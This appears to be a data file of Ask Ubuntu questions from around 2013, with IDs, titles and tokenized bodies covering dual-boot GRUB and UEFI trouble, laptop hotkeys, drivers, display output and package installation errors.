378446	why is my usb stick opened twice after a format ?	when i format a usb stick or a mp3 reader , after the completion ubuntu always mount and open the media twice , and two identical windows appear on the screen . this was happening also on ubuntu 10.04 lts . why ? note : my ubuntu 12.04 is freshly installed .
378451	boot loader will not work on my computer	i 've tried installing ubuntu 13.10 ( 64bit ) alongside my version of windows 7 . the only problem is , my computer never loads the grub 2 boot manager , it goes straight to the windows boot manager . i 've tried reinstalling ubuntu and also running boot repair from the live cd , but nothing has fixed the issue . my bios apparently is booting uefi , if that could be causing the issue . also , i am not getting a option to boot grub in the bios . the only two options i have are `` windows boot manager '' and my cd/dvd drive . i thought i might be able to get it to boot ubuntu if i added a custom boot option . i tried the filepath : `` dev/sda '' because that it where the boot info script from boot repair said grub2 was installed -- then again , i am probably doing this wrong . i also tried setting a filepath to `` dev/sda4 '' because where ubuntu is intalled . both of these options make my comp boot straight to the bios when i have windows boot manager disabled . here is the pastebin from boot repair : http : //paste.ubuntu.com/6432676/ can anybody help ? issue resolved : a combination of these ideas below worked . when i disabled uefi , it did n't boot ubuntu , but it booted the cd into the text based menu , which allowed me to boot from the hard drive , which allowed me to boot into ubuntu installed on my hdd . from there i was able to do a boot repair , converting to a uefi boot . then i reinabled uefi in the settings and added a boot option with the path : sda2/efi/ubuntu/grubx64.efi . and boom ! the bootloader actually loaded directly from the hdd .
378453	asus n56vz not charging on 13.10	i 'm new to running ubuntu ( or linux for that matter ) as a desktop os , i do however have experience on the server side of linux . i 've installed ubuntu 13.10 on my asus n56vz-s4215h . it was no where near a smooth operation , i had to do several reinstalls to get it to work . i was faced by several issues and some i was able to resolve ( booting into grub commandline instead of ubuntu and , installing the nvidia gpu driver ( that 's a real pain in the ass ! ) ) . i 'm still however faced by several issues : it seems my laptop is no longer charging . the indicator on the top right has been on 40 % for hours now . did i break my laptop or is the indicator false ? thanks in advance ! edit 1 : the charging problem has been resolved . my bios was running v215 . but after upgrading to v217 charging worked again ! : d i 'm still looking into the function keys , but that seems to be a known problem with users of linux on the asus n56vz laptops . if i find a solution i 'll update it here . edit 2 : removed 2nd problem and created new topic : ( some ) function keys not working
378457	force key release problems	my problem is that when i press fn+f6/f7/f8 it is not releasing the key . its just these ones , once i 've pressed them they do n't stop and my whole keyboard ceases up and does n't work , obviously because it is constantly processing the fn key command because it has n't released it . now when i searched this problem it said i needed to add something to 60-keyboard.hwdb . but ive tried what i think is right ( probably wrong ) and it doesnt work i should probably mention that i am running 13.10 with a samsung series 5 laptop full model name is np270e5e-k04uk . please help me ! the keys that arent working are the fn+f6 which is mute , fn+f7 which is volume down , and fn+f8 which is volume up .
378459	device id changed for usb modem	i have a zte modem which has a vendor id 0x19d2 and a device id 0xffe9 . i was trying to make the usb modem work , ( and apparently i have changed some settings ) , but now the device id is being reported as 0xfff5 . how to set it back ?
378462	how to set the superuser bit ?	i have a backup script that contains several `` sudo '' commands . i do n't want to have to type my username and password each time i run this script . so , i tried to add the `` suid '' bit like this : sudo chmod u+s < filename > now my file looks like this : -rwsrwxr-x 1 root erelsgl 1868 nov 12 09:03 < filename > but , when i run the file , i still get a password prompt . what am i doing wrong ?
378463	where is `` opacity '' in compizconfig settings manager ?	i ca n't find the opacity in compiz , `` no matches found '' . in accessibility , i only have `` enhanced zoom desktop '' , i do n't have opacity .
378465	questions on ubuntu 13.04 on asus z87-pro motherboard : bluetooth and display	i have recently purchased a asus z87-pro motherboard and installed ubuntu 13.04 . everything seemed working fine . but , i have the following questions . 1 ) ubuntu detected the bluetooth . when i tried to search my phone , it could n't find it . but if i switched to windows 7 , the bluetooth worked perfectly ( after installed all asus come-with drivers ) . is it a driver problem ? if it 's , is there a new linux bluetooth driver out there ? 2 ) i connected my system to the monitor using hdmi , it worked fine . but i was wondering why xrandr -q showed : screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 vga1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis ) hdmi3 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 510mm x 287mm 1920x1080 60.0*+ 50.0 1600x1200 60.0 1680x1050 59.9 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1280x800 59.9 1280x720 50.0 60.0 1024x768 60.0 800x600 60.3 56.2 720x576 50.0 720x480 59.9 640x480 60.0 since the mb supports displayport 1.2 monitor daisy chain up to 3 displays , i am not surprise to see dp1 , dp2 and dp3 there . how come it also showed hdmi1 , hdmi2 and hdmi3 ? but it only has one hdmi port . how can this happen ?
378466	time setting conflict in a dual boot system	my dual boot computer has microsoft windows and ubuntu 13.10 installed . suggestions on this website recommend setting the time parameter for ubuntu to manual . i did that . in fact , i changed both the microsoft windows setting and the ubuntu setting to manual . however , the time conflict still shows . why is ubuntu picking up the system time setting as gmt + 0.00 and what can i do to change this bizarre error ?
378467	can a deb package contain a ppa dependency and install packages from the ppa ?	when creating a .deb package i create a file named control that contains some fields : package : my-qt-app-name version : 0.01 architecture : all maintainer : my name < my email address > installed-size : 2 depends : some-package-from-ppa section : extras priority : optional homepage : my homepage description : some description some-package-from-ppa is not installed on the computer . it can be installed only adding a ppa , running apt-get update and then apt-get install some-package-from-ppa . can a control file from a deb package contain a ppa address and install that package when the deb file is installed ?
378471	importerror : no module named mechanize	i am having an issue where i have definitely installed mechanize both on my machine and in various virtual environments . when i running the program got error message importerror : no module named mechanize . i think it may be permission problem . the package was somehow installed with root rw permission only , other user just can not rw to it . how to solve this problem ?
378472	changing grub purple interface to cli	i want to see all everything in booting like what is being loaded and all instead of grub purple interface.. so is there any way to enable text kind of mode and disable that purple screen ? ?
378476	uprade ubuntu can not start	i upgrade my ubuntu to 12.10 and after the installation , it restarts . but just after restarting , start up can not proceed due to this pop up . error : file not found . grub rescue > . evrytime i shut down and turn on , the screen was blank with error : file not found . grub rescue > how to solve this ? ? please help ...
378482	which version of oss do i download for drivers for my soundcard ?	i 'm running ubuntu 64 bit 13.10 , processor intel® core™2 cpu 6600 @ 2.40ghz × 2 . i have found a web-site which will supply me with drivers for my audiophile 2496 pci soundcard . which version do i download for my oss ? the choice is as follows : - linux x86 linux 2.4 ( x86 ) : for any linux 2.4.xx kernel ether smp or uniprocessor kernel ( eg : redhat , mandrake , suse , caldera , turbolinux , debian , etc ) linux 2.6 ( x86 ) : for any linux 2.6.xx kernel ether smp or uniprocessor kernel compiled without config_regparm . only mandrake 10 series requires this version . linux 2.6 ( x86 ) ( regparm ) : for any linux 2.6.xx kernel ether smp or uniprocessor kernel compiled with config_regparm=y . suse/fedora core3 and others require this version linux 2.2 ( x86 ) ( old ) : for any linux 2.2.x/2.4.x kernel running on x86 processor . linux amd64 linux 2.6 ( amd64 ) : for any linux 2.6.xx kernel ether smp or uniprocessor kernel on amd athlon64/opteron solaris solaris ( x86 ) : solaris v7/v8/v9/v10 on intel x86 solaris ( x86 ) ( pci-only ) : pci bus only version with support for all pci cards solaris ( sparc ) 32bit : solaris v7/v8/v9/v10 on pci bus based sparc with 32bit kernel solaris ( sparc ) 64bit : solaris v7/v8/v9 on pci bus based sparc with 64bit kernel all others aix 4 : aix 4.x/5.x on powerpcs bsd/os 4.2 : bsd/os 4.2 for x86 freebsd 4.x : freebsd 4x release , for smp systems , select the -smp version . freebsd 5.2.3 : freebsd 5.2.1 release ( both smp/up supported ) lynxos 4 : lynx real time v4 x86 sco openserver 5 : sco openserver release 5 for x86 openbsd 3.x : openbsd 3.x for x86 netbsd 2.0 : netbsd 2.0 for x86 hpux : hpux 11 for pa-risc machines with pci slots unixware 7 : unixware 7 for x86 tru64 : tru64 v5.x for alpha processor any of the above/none of the above ?
378484	ubuntu 12.04 and windows 7 dual boot on ssd + hdd raid1	despite reading dozens of howtos and so on i am getting crazy about trying to get my dual boot system running . maybe you can help me . my system : asus z87-pro motherboard with uefi samsung 840 pro 256 gb ssd 2 x seagate desktop ( former barracuda ) 1 tb hdd 16 gb ram what i want to do : install windows 7 professional 64 bit and ubuntu 12.04 parallel on ssd : 200 gb of ssd nfts partition for windows 50 gb of ssd ext2 for ubuntu , / folder 16 gb of ssd as swap for ubuntu have the hdds in raid 1 ( 'fakeraid ' by motherboard controller ) as data disk in nfts alternative : ubuntu on the raid disk what i tried : windows on ssd / ubuntu on hdd raid create raid 1 with raid controller during pc start windows installation on ssd linux installation on raid problem : grub does not recognize windows windows and ubuntu on ssd a create raid 1 with raid controller during pc start windows installation on ssd linux installation on ssd problem : ubuntu does not recognize windows installation and wants to overwrite the whole ssd windows and ubuntu on ssd b disconnect hdds from mainboard windows installation on ssd linux installation on ssd problem : ubuntu does not recognize windows installation and wants to overwrite the whole ssd i also have tried to pre-partitionate the disks with gparted , did not work neither . does anyone have a tip for me ? some of my questions : why does ubuntu not recognize windows ? can i install ubuntu on a raided disk ? where to install the bootmanager ?
378490	disable task bar in ubuntu gnome 13.10	how do i disable the task bar in ubuntu gnome 13.10 . i enabled it somehow using the gnome tweak tool but now i ca n't find the button to toggle it again . i 'm talking about the one which appears at the bottom in this screenshot .
378492	pygame installation for ubuntu 12.04 lts	can anyone suggest me how to install the pygame for use in the construction of the graphics games using the python ?
378494	hp530 ubuntu 12.04 black screen after restart	i installed a fresh copy of ubuntu 12.04 . i started the machine and was able to login successfully the first time . upon any restarts i see a black screen , then i hear the audio drum roll that is played when it is time to login , i however only have a black screen . i then loaded up grub loader by holding shift during booting and set to nomodeset ( i believe this goes low graphics default ) . i am able to boot in . i downloaded and ran boot repair , below you can find the boot report . upon running boot repair and restarting it boots in fine the first time . however on subsequent attempts it will just go to the black screen . please help ! http : //paste.ubuntu.com/6433303/
378495	restore with back in time after fresh install of ubuntu	i back up my home , which includes a list of installed softwares and ppa , on an external hard drive using back in time . i plan to do a fresh install of ubuntu . will i then be able to install back in time on the fresh machine , then restore everything from there ? from what i have read on the internet , there are certain pitfalls , e.g . the two ubuntu installs must be configured exactly the same , back in time settings must be the same , and i can only restore one folder at a time ( ! )
378497	eclipse error on ubuntu 13.10	i have successfully installed oracle java 64 bit version on my machine ( checked with java -version ) . later i have downloaded eclipse kepler 64 bit but when i start it , it does not work and it is giving me the error popup with message an error has occurred . see the log file /home/nandkumar/.eclipse/org.eclipse.platform_3.8_155965261/configuration/1384713086093.log so i checked log file , see below log file contents : ! session mon nov 18 00:01:26 ist 2013 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ! entry org.eclipse.equinox.launcher 4 0 2013-11-18 00:01:26.132 ! message exception launching the eclipse platform : ! stack java.lang.internalerror : internal error : sha-1 not available . at sun.security.provider.securerandom.init ( securerandom.java:99 ) at sun.security.provider.securerandom. < init > ( securerandom.java:78 ) at java.security.securerandom.getdefaultprng ( securerandom.java:191 ) at java.security.securerandom. < init > ( securerandom.java:155 ) at com.sun.crypto.provider.sunjce. < clinit > ( sunjce.java:94 ) at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:526 ) at java.lang.class.newinstance ( class.java:374 ) at sun.security.jca.providerconfig $ 2.run ( providerconfig.java:221 ) at sun.security.jca.providerconfig $ 2.run ( providerconfig.java:206 ) at java.security.accesscontroller.doprivileged ( native method ) at sun.security.jca.providerconfig.doloadprovider ( providerconfig.java:206 ) at sun.security.jca.providerconfig.getprovider ( providerconfig.java:187 ) at sun.security.jca.providerlist.getprovider ( providerlist.java:232 ) at sun.security.jca.providerlist $ 3.get ( providerlist.java:147 ) at sun.security.jca.providerlist $ 3.get ( providerlist.java:142 ) at java.util.abstractlist $ itr.next ( abstractlist.java:358 ) at java.security.securerandom.getprngalgorithm ( securerandom.java:542 ) at java.security.securerandom.getdefaultprng ( securerandom.java:187 ) at java.security.securerandom. < init > ( securerandom.java:155 ) at java.io.file $ tempdirectory. < clinit > ( file.java:1878 ) at java.io.file.createtempfile ( file.java:1987 ) at org.eclipse.equinox.launcher.main.canwrite ( main.java:1305 ) at org.eclipse.equinox.launcher.main.checkconfigurationlocation ( main.java:698 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:575 ) at org.eclipse.equinox.launcher.main.run ( main.java:1438 ) at org.eclipse.equinox.launcher.main.main ( main.java:1414 ) please help with this .
378499	installed ubuntu with faulty ram : do i need to reinstall ?	i recently installed ubuntu 12.04 on my sony viao vpceb3e1e . everything works fine till i reach a certain amount of memory , then all the apps crash . i found out it was due to faulty ram . i used memtest86+ to figure out the problem and only 1 of my ram sticks is broken . i 'm now only using the non-broken one . since i installed ubuntu with the faulty ram to start off with ( i 'm 100 % sure it was broken when i installed it since it was a recurring issue for 6 months ) , should i do a full reinstall ? or , is there a way to check the consistency of my system to see if there have been errors written to the disk ? and a fix ?
378509	brightness hotkey does n't work properly on my hardware	i have a system 76 gazelle pro notebook . sound hotkeys work correctly but not brightness one . when i push fn+f8 , it displays the ubuntu notification about brightness going down but the real brightness ( actual quantity of lignt ) does n't go lower . for fn+f9 ( brightness up ) , the notification appears but doens n't increment , nor the real brightness go high ) . by reading this and that , i got few informations but do n't know what to do . thank you !
378511	how install realtime kernel version 3.12 ?	i recently installed ubuntu 12.04 and wow ! is very good . i 'm a music maker and tried with audacity to record with my microphone usb condenser and the sound was very bad , like i do n't know , was terrible . there are linux kernel that have a low latency but there is n't for the kernel 3.12 , so now see that a new method to record sound well with real-time kernel i see the files in this link https : //www.kernel.org/pub/linux/kernel/projects/rt/3.12/ but i do n't know how install the files in my kernel linux . what i can do ?
378514	no unity in lightdm after installing from software center !	hello i am using ubuntu studio 13.10 and i want to try unity 7 , i installed unity desktop from software center around 60mb , but there is not unity in lightdm to select , did i missed something ? also in terminal when i type `` unity '' it comes up showing it is there . thanks for answers
378515	broken chainloader after cloning drive	i have a multiboot system with windows xp and ubuntu 13.04 . i use grub 2 to boot from the mbr to a chainloader in the ubuntu partition , and the chainloader gives me the option of booting to xp or ubuntu . i just got a new drive and cloned the entire original drive ( a ) to the new drive ( b ) . well , something happened and i do n't have a backup that will help me . the chainloader on drive a is corrupt , and drops me down to a grub rescue prompt . i thought maybe the drive designations were changed , so i was able to hack in to the menu and try and modify them , using fdisk to give me the drive designations , but that did n't work . i have since gone back to a generic mbr on drive a to be able to boot into xp . on drive b , the chainloader is also corrupt , but does n't seem to be as bad . it goes into the menu , and i can select my xp partition and it boots fine , but i 'm not able to boot into ubuntu . right now , i 'm running off the ubuntu 13.04 live dvd . i am unable to mount the ubuntu partition for drive a . perhaps i need to let that go . i can clone back to it later . i can mount the ubuntu partition for drive b , and get in and modify files and do all kinds of stuff . i figure i just need to rebuild my chainloader grub.cfg file and everything will be ok , but when i run the command `` sudo update-grub '' , i get the error message failed to get canonical path of /cow . i did some poking around , and came across the suggestion to run the command sudo chroot /mnt . i do that and get the error message can not find a device for / ( is /dev mounted ? ) . i try changing to the mount of my drive b ( /mnt/sdb5 ) and it says no such file or directory . i guess i have two questions : am i thinking correctly that if i can run update-grub and rebuild my grub.cfg file on drive b , i will be able to boot into ubuntu ? if so , how can i rebuild it when i 'm running off the live dvd ?
378518	sound card not working in ubuntu 12.04 lts	my system has ymf 744b sound card . i am looking for compatible drivers . sound is not working ubuntu 12.0 . looking for any help please .
378521	how to install both 64 and 32 bits version of java at the same time ?	i am trying to get a game to work ( wakfu ) . i tried to apply most of the info here , but nothing helped me at all . i have ubuntu 12.04 and i would like to install java32 run-time alongside java64 . having only java32 installed is alright . if it is possible to have both javas installed please tell me how to change between them . thanks .
378522	harm in exiting terminal mid update ?	i trying to get to grips with ubuntu ( as a brand new convert ) . the only commands i am entering into the terminal are things like 'sudo apt-get update ' or 'sudo apt-get install build-essential bison flex libsndfile1-dev libasound2-dev libqt4-dev libqscintilla2-dev ' . the installs and updates have n't quite been working as i want ( i do n't know the causes yet ) , i just want to know if i can experiment , exit terminal and reinstall things that i have already tried to install without causing problems to the system . for now i just want to have peace of mind in my trouble shooting , before i need to ask more specific questions about issues . much appreciated !
378524	how can i migrate from elementaryos to ubuntu 13.10 ?	i 've been using elementaryos for a while now , but i want to try gnome shell 3.10 an from what i 've read is required to have installed ubuntu 13.10 and since elementary is based on 12.10 i wont be able to , so , how can i migrate to ubuntu 13.10 without loosing my data ?
378526	xfce full window tile	i 'm using xfce 4.10 ( xubuntu 13.10 ) , when i drag any window to the top of the screen , it gets tiled to half desktop , like this : also when i drag the window to the left or right , it does n't stick vertically . how can i have it maximize windows when tiling them on the top or bottom of the screen ?
378527	coordino permission issues ?	i have downloaded the coordino and wanted to run it on ubuntu , tried to run it but its giving the following errors warning : require ( app/webroot/index.php ) : failed to open stream : permission denied in /var/www/namal-geeks.com/index.php on line 55 fatal error : require ( ) : failed opening required 'app/webroot/index.php ' ( include_path= ' . : /usr/share/php : /usr/share/pear : /var/www/namal-geeks.com : /var/www/namal-geeks.com/app/ ' ) in /var/www/namal-geeks.com/index.php on line 55 tried to change the permission of the folders by using sudo chmod -r 775 coordino-directory //using 775 as rinzwind mentioned it could be a security problem but that did n't worked seems it requires a file and cant get it because of permissions looked into the file and line where error is line 55 require app_dir . ds . webroot_dir . ds . 'index.php ' ; i am not sure how do i solve the problem ? help !
378529	kubuntu 12.04 d-bus not starting on login	i have no idea why , but when i tried to login this morning a window popped up while in splash screen `` could not start d-bus . can you call qdbus ? '' which when clicked returned me to kdm . i have consulted answers to people who had a similar problem , but none of the advice helped in my case . i tried changing the ownership of all the files in my home folder , i deleted ~/.xauthority . no dice . now i 'm at loss for what to do next . if it 's any help here 's .xsession-errors : xsession : x session started for frana at sun nov 17 17:44:01 cet 2013 localuser : frana being added to access control list setting im through im-switch for locale=en_us . start im through /etc/x11/xinit/xinput.d/all_all linked to /etc/x11/xinit xinput.d/default . /etc/x11/xsession.d/90consolekit : line 14 : dbus-send : command not found /etc/x11/xsession.d/90consolekit : line 18 : dbus-send : command not found startkde : starting up ... /usr/bin/x-session-manager : 1 : /usr/bin/x-session-manager : dbus-launch : not found startkde : could not start d-bus . can you call qdbus ? and kdm.log : x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-37-generic x86_64 ubuntu current operating system : linux cf-book 3.2.0-52-generic # 78-ubuntu smp fri jul 26 16:21:44 utc 2013 x86_64 kernel command line : boot_image=/vmlinuz-3.2.0-52-generic root=uuid=6f489c87e29f- 4c44-83f6-95b071402600 ro quiet splash vt.handoff=7 build date : 11 april 2013 01:05:39pm xorg-server 2:1.11.4-0ubuntu10.13 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : sun nov 17 17:44:05 2013 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' klauncher ( 2230 ) kdemain : no dbus session-bus found . check if you have started the dbus server . kdeinit4 : communication error with launcher . exiting ! kdmgreet ( 2222 ) /kdecore ( k*timezone* ) : ksystemtimezones : ktimezoned initialize ( ) d-bus call failed : `` not connected to d-bus server '' kdmgreet ( 2222 ) /kdecore ( k*timezone* ) : no time zone information obtained from ktimezoned qinotifyfilesystemwatcherengine : :addpaths : inotify_add_watch failed : no such file or directory qfilesystemwatcher : failed to add paths : /tmp/0034872719/.config/ibus/bus
378532	( some ) function keys not working	i 've installed ubuntu 13.10 today on my asus n56vz-s4215h , and encountered some issues ; some of my function keys do n't work , screen brightness , turn off screen and , sleep do work ( screen brightness does not give me the slider i should get on my screen ) . however , my keyboard backlight , volume controls and the rest do not work . in some of my earlier installs they all worked fine . i do n't recall doing anything different this time round to get some of these issues . is there some way to fix this or do i need to do yet another install and hope for the best ? edit 1 : they work perfectly fine while i run the live os from the usb , which i find odd .
378534	black screen after upgrading from ubuntu 13.04 to 13.10	after upgrading tells me this is over , but with problems , then i will accept , i open the software updater and tells me to restart , restart , and left me with a black screen with a coded message and does nothing or leave off . please help .
378535	how to install canon lbp 2900 in ubuntu 13.04	many of others tried to solve this problem but they cant . how can i install canon i-sensys lbp2900 in ubuntu 13.04 ?
378536	can you lock the unity screen after 15 minutes , not shown in `` brightness & lock '' dropdown ?	in ubuntu 13.10 , the brightness & lock dialog lets you lock the screen after idle time of 1 , 2 , 3 , 5 , 10 , 30 , and 60 minutes . is it possible to set a different idle time not shown in this list , say , 15 minutes ? ( frankly , it 's silly to present only a few options like this ... . why not permit an arbitrary number of minutes ? )
378541	how i can know that a ubuntu iso was created using a live cd customization tool ?	how i can know that a ubuntu iso was created using a live cd customization tool , e.g . remastersys ? or how i can know that a ubuntu iso was created or generated ? do live cd customization tools leave things in generated iso ?
378542	`` /proc/net/dev '' contains all zeroes	on my ubuntu 13.10 desktop , the /proc/net/dev file contains only zeroes for all interfaces other than lo , despite having a working connection . this seems to lead most bandwidth monitoring tools to believe that there is no network traffic at all , including gnome-system-monitor . here 's a screenshot of etherape , system monitor and /proc/net/dev all together : as you can see , etherape is recording about 1.16 mbps in https traffic alone , while system monitor says 0 bytes/s . any ideas as to why this would happen , and how to solve this ?
378548	can i recover the previous version of a file in ubuntu1 ?	i was working with an important file and i had a crash while i was saving it . the file is now damaged and i can not open it . it is also a synchronized file , so i have it in ubuntu1 . the problem is that the damaged version was uploaded , so i do not have access to it in ubuntu1 either . is there any way i can find a previous version in ubuntu1 ? thanks for your help
378549	restoring original colors of grayed out window	when a program is not responding its window gays out ( like a transparent gray layer ) . but sometimes the color of that window does n't restore after it responds again . for example when i open firefox with lots of open tabs it does n't respond for a while and is grayed out ; but if i minimize the window while it is not responding when it responds again and i maximize its window , the original colors are not restored and window remains grayed out . i can force unity to restore colors of all windows by running unity -- replace & but this replaces the entire unity . is there a command that force unity to restore the not responding state of a specific window ? thanks
378550	boot problem after upgrade to 12.4.3	i 've ubuntu 12.4.2 installed on my machine . few days ago there was a long list of updates one of which is an update for the display card ( geforce 540m ) . after the update the system will only boot into a black screen where i can input the user name and the password ... nothing else i can do . i noticed when booting into this black screen that it is written ubuntu 12.4.3 where as i used to have 12.4.2 . any one can help me out of this please .
378551	ubuntu 12.04 white stripes on second monitor	my dual monitor settings worked perfectly fine until just recently . now the resolution on the second monitor is very low and it shows white vertical stripes . i am using ubuntu 12.04 with gnome 3.4 . i am using a docking station for my thinkpad t410s , that is how the laptop is connected . the main monitor ( which works well ) is connected via dvi . the laptop monitor works well wenn not attached to the dual screen system . if i turn off the main monitor via software , the laptop monitor still shows white stripes . here is my xrandr -q : screen 0 : minimum 320 x 200 , current 3360 x 1080 , maximum 8192 x 8192 lvds1 connected 1440x900+1920+0 ( normal left inverted right x axis y axis ) 304mm x 190mm 1440x900 60.1*+ 59.9 49.3 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) hdmi3 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 509mm x 286mm 1920x1080 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 dp2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis )
378558	`` unable to locate package '' while trying to install packages by apt	when i try to install any package through the command line , i get an error . can anyone help me on this ? $ sudo apt-get install < package > reading package lists ... done building dependency tree reading state information ... done e : unable to locate package < package >
378560	how to force logout after a time limit ?	i work in a library and i need to set a time limit for the user , like 20 minutes , and when the time is over the user is forced to logout . is possible to do that ?
378561	running ubuntu off multiple usb sticks	i know that using usb drives to boot linux is a slower alternative to hdd 's , however , i wanted to know the feasibility of using multiple usb drives to boot . specifically , i wish to use a single usb 3.0 drive for booting , and i want to know if it 's possible to migrate /home to another drive . the reason i 'm doing this is because my hard drive connector pins seem faulty , and i want something to use in the interim .
378569	keyboard shortcut to switch to an application by name ?	is there a tool that will let me do the following sequence ? type a keyboard shortcut type in the name of an application currently open on some desktop hit enter to switch to that desktop , and bring that application into focus instantly ( the chromium plugin vimium provides an analogous feature for browser tabs : pressing shift-t in that environment to list all tabs , type in some words to filter by title , and hit enter to bring up the selected tab . )
378571	how to edit the x11/xorg.conf	hy everyone . i had some issues making my brightness work on my macbook on ubuntu lts . i saw that people use to edit the /etc/x11/xorg.conf file using gedit to make it work . unfortunately i erased in the section `` device '' the line : identifier `` device0 '' since x11 is not able to found the screen and i ca n't access the gui . i entered recovery mode and try to put the line back using vi but i ca n't edit the file even with sudo vi xorg.conf and event using this inside the vim session : w ! sudo tee % > /dev/null it says `` e212 ca n't open file for writing '' the ls -l status of the file is : -rw-r -- r --
378572	how to turn off the multicast dns and multicast upnp services in ubuntu ?	i just wonder how to turn off those 2 services completly since i 've got no use for them as they are a security risk in my case . cause i 've got a local device for which i ca n't block upnp and that device is using the multicast ip range and the multicast dns can be accessed cause of the problem mentioned above . sure i could just block it in the router but i wonder if its possible to just disable it , os wise . as i googled i found something concerning the stopping of the multicast dns service , instructions were as follows : # chkconfig -- level3 avahi-daemon off # service avahi-daemon stop do n't know how to check if its disabled now tho . so i would appreciate it if someone could tell me how to turn off these 2 services ?
378573	problems with unzipping .tar.gz	for installations i 've needed to unzip .tar.gz so ive used tar fvxz file_name.tar.gz yet it replies with tar ( child ) : file_name.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now what should i do ?
378574	can not allocate ntfs/windows partition in ubuntu	what happens is that windows will not let me partition so partition from the live cd from a usb and formatting do not select anything other unit remained well but after installing ubuntu did not see it anywhere the windows partition and wanted to know if i can help separate and i have checked the space and the space allocated to the partition when i searched the whole pc but can not find any trace of windows does not appear in the beginning goes directly to ubuntu but the space is assigned . please help
378575	how to connect to network attached storage in ubuntu 12.04	just did a clean install of 12.04 on my hp laptop . now no matter what i do i can not see and i assume can not mount my cisco44615 nas . the nas is connected directly to my router . with my dell laptop running 11.04 i was able to connect right out of the box . but 12.04 i can not . nothing has changed in my network . my nas is assigned it 's ip by the router and it is not static . never has been and i have never had connection issues in 11.04 , even after power outages & ect issues where the router reassigns ip 's . i 've downloaded samba , smb client . but i can not see the nas . i even unplugged the nas so it would get a new ip but that did not help . i 'm stumped , thanks in advance for any help . steve
378578	installing from the windows intaller , does it erase my other os ?	i want to install ubuntu on windows with windows installer but it does not ask if i want to install it on a partition , so i assume they are going to erase my old os , will this happen ?
378580	hp pavilion g7-1312nr will not run ubuntu from live cd or install	i was trying to set up my hp with dual boot so i installed windows 7 ultimate 64 bit . after doing that i put in my ubuntu live usb and selected it from the boot menu . it pops up the purple screen then i get the ubuntu logo with the five little orange dots . it sits like that for a couple of minutes then fades out to pure white then fades back to the ubuntu logo endlessly cycling . so i ran the install from alternate iso ( this is ubuntu 13.10 but i also tried 12.04 normal and alterentive ) . it seamed to run just fine and installed smoothly then after install i tried to boot into it and i got the same error while booting form the hard drive . it has a 2.5ghz/1.9ghz vision a4 technology from amd amd dual-core a4-3305m accelerated processor aamd radeon hd 6480g discrete-class graphics 8 gb of ram . i have tried looking for some error log to show you but i have no way of accessing ubuntu at all . how to fix this ?
378585	how can i make caps lock act like the caps lock key on a mac ?	for those of you who do n't know , the ways the caps key on mac works as follows : when you activate the caps key , it sends a continuous pulse . on linux ( and windows ) , it only sends one pulse to turn it on and one pulse to turn it off . how can i make my caps key work like a mac ?
378586	previous os not detected at installation	i 've read some other threads with the same issue , not being able to solve my problem . when i try to install ubuntu with a usb , it does not recognize the os i have already installed ( windows 8 ) . i want a dual-boot system , i do n't want to replace the one i already have . it 's a new notebook where i 'm installing it into . i 've read this https : //help.ubuntu.com/community/uefi but it does not state this problem i 'm having . i do n't know if i have to make a new partition ( or how ) , or what else to do . i have also read this ubuntu is not detecting previous os partitions but i do n't understand what to do once i type what it says . i would install it buy using wubi but it fails on the middle of the instalation .
378588	ubuntu tweak scripts does n't work on ubuntu 13.10	i installed ubuntu tweek on my ubuntu but the scripts i added does n't work , i tried to add the `` create launcher '' script and does n't work , i 'm not able to create a launcher . the menu in right click button simply do n't appear
378591	icons in the tray do not work properly ubuntu 13.10	context i have just installed ubuntu 13.10 from an iso on my asus x202e and everything was working fine so far . however i discovered that the icons from the tray ( dropbox , wifi , keyboard , layout , battery and so on ) are not working properly . problem description most of the time when i click on them they show the menu i am expecting to see but in some cases they just do not respond at all . i then move my pointer and re-click and everything is working well . this is not a big deal but i do not understand the cause of that and i would like to fix it for a smoother use . note that not all the icons are not working . the three most right buttons are ok : ( shutdown-system settings- ... ) icon , sound options and clock-calendar icons . solutions tried i already ran killall unity-panel-service but that did not solve the problem . as proposed by angel salinas huerta , i enabled the proposed updates in the software center and upgraded the system , but the problem is still there . after wandering for some times on this site and some googling i hpoe to find some answers from you !
